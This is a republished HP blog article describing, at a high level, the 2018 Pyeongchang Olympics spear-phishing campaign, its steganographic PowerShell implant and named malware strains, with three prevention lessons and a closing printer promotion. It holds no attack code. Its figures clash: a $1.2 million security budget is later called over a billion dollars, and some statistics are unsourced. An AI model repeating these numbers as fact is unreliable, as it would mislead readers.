used with permission from Tektonika (HP)
by Jasmine W. Gordon
With the world’s largest global sporting event officially underway, hacking prevention is probably the furthest thing from your mind. But it’s pretty high up on the event organizers’ minds. While it may not have hit mainstream headlines, an explosive spear phishing attack and other IT security issues have left this year’s event among the most hacked sporting events of all time. Cybercriminals want to steal the gold, and their recent tactics reveal a lot about the state of the information security threat vector in 2018.
Not only is this year’s event one of the most political in history, but Wired points out that now, “In 2018, [it’s] also become a nexus of hacker skullduggery.” The complex cybercrime spree that began several weeks ago isn’t the work of your average script kiddies. The campaign involved a near-perfect symphony of hacking techniques, including social engineering, complex technical tactics, nightmarish malware, and more.
A spear phishing nightmare
On December 22, 2017, South Korean organizations associated with setting up for this massive event received an email that appeared to be sent from South Korea’s National Counter-Terrorism Center (NCTC). Not only was the purported sender a trustworthy source—the email was timed perfectly to coincide with NCTC’s on-the-ground anti-terror drills.
The email contained a document attachment with a script-laden image that had a hypertext application implant. This ushered in a PowerShell back door at 2 a.m., when the assailants assumed the recipients weren’t actively using their work computers. Next, four strains of malware—dubbed Gold Dragon, Brave Prince, Ghost419, and Running Rat by McAfee analysts—worked in tandem to help the hackers establish a permanent presence on the target’s network and siphon away any information they wanted from their victims’ computers.
How did this hack sneak through?
Attribution is notoriously difficult, particularly when it comes to such sophisticated campaigns. However, analysts project that the issues are likely state-sponsored or, at least, politically motivated. Ryan Sherstobitoff tells CyberScoop that the attacks have certain signatures that point to perpetration by a group—not an individual.
One significant clue pointing to this conclusion is that the attacks aren’t financially motivated, at least not in the quick payload style of today’s viral ransomware epidemic. Sherstobitoff says, “The persistent data exfiltration we see from these implants could give the attacker a potential advantage.”
If it proves true that the cyber attacks were politically motivated, you can throw it on a mounting pile of state-sponsored cybersecurity issues surrounding Pyeongchang. A notorious hacker outfit known as Fancy Bear has stolen and leaked documents with the purported intent of exposing athletes guilty of doping. A statement published on the group’s website hints there are more leaks to come, too.
3 hacking prevention lessons from Pyeongchang
This year’s event in Pyeongchang has a reported cybersecurity budget of $1.2 million. It’s no small amount—until you consider that the entire IT infrastructure was built from the ground up for the two-week event. The US Department of Homeland Security has officially warned tourists attending the event to beware security issues, pointing to the usual culprits, like open Wi-Fi networks and the risks of out-of-date mobile software.
With over 300 computer systems hacked before the torch was even lit, security officials declined to say exactly how they were responding but made it clear they’re stepping up to meet the challenge. While you can keep your fingers crossed that tourists stay secure and hackers don’t manage to mess with official event scoring, there’s plenty of practical hacking prevention insights in all this IT security drama. Here’s what you can learn from these sophisticated attacks:
1. Criminals are moving faster than the Jamaican bobsled team
The email attack was launched December 22—that’s just two days after December 20, when the new tool Invoke-PSImage was released to the public. This tool enables steganography, or the ability to embed a script into the pixels of a .PNG image. In other words, it took hackers only two days to build the technical mechanisms of the attack.
“There is no need to use a zero day, because cybercriminals now develop and apply hacking tools much more quickly,” writes Raj Samani in Forbes. While zero-day threats are still a frightening reality, the idea that hacker collectives are moving so quickly could be even scarier.
2. Social engineering tactics are soaring
You can hardly blame the organizations who fell prey to the Pyeongchang email attacks. After all, the emails appeared to coincide perfectly with the anti-terror activities by the NCTC. When coupled with the scheduled 2 a.m. install of the back door and malware, it’s clear the cyber attacks in Pyeongchang—like most IT security incidents—were strategically planned.
3. Today’s IT security attacks are harder to detect
The email crime spree fits the profile of file-less attacks, which is technically a misnomer, since threats within this profile aren’t technically file-free—they’re simply much harder to detect than traditional modes of depositing malware. File-less attacks rely on vulnerabilities within whitelisted programs to deposit malware, such as Flash and the Windows PowerShell tool. Last year, 77 percent of compromised security incidents were file-less. In general, this category is 10 times more effective than alternatives.
The growth of file-less attacks, sophisticated social engineering, and rapid-fire hacker coding is bad news if your security is solely reliant on old-school protection methods, like traditional, signature-based antivirus. It’s not good news any way you slice it, but you’ve got less to worry about if you have best-of-class security solutions in your corner—like a business printer that’s engineered to detect attacks and self-heal to prevent them from infecting your entire network.
With over a billion dollars put into cybersecurity, you can’t say the organizations working to support this year’s event in Pyeongchang weren’t invested in hacking prevention. While you can hope the spear phishing attack in late December represents the worst cybersecurity issue of the event, the signatures of the likely state-sponsored hack teach some invaluable lessons on the state of cybersecurity in 2018.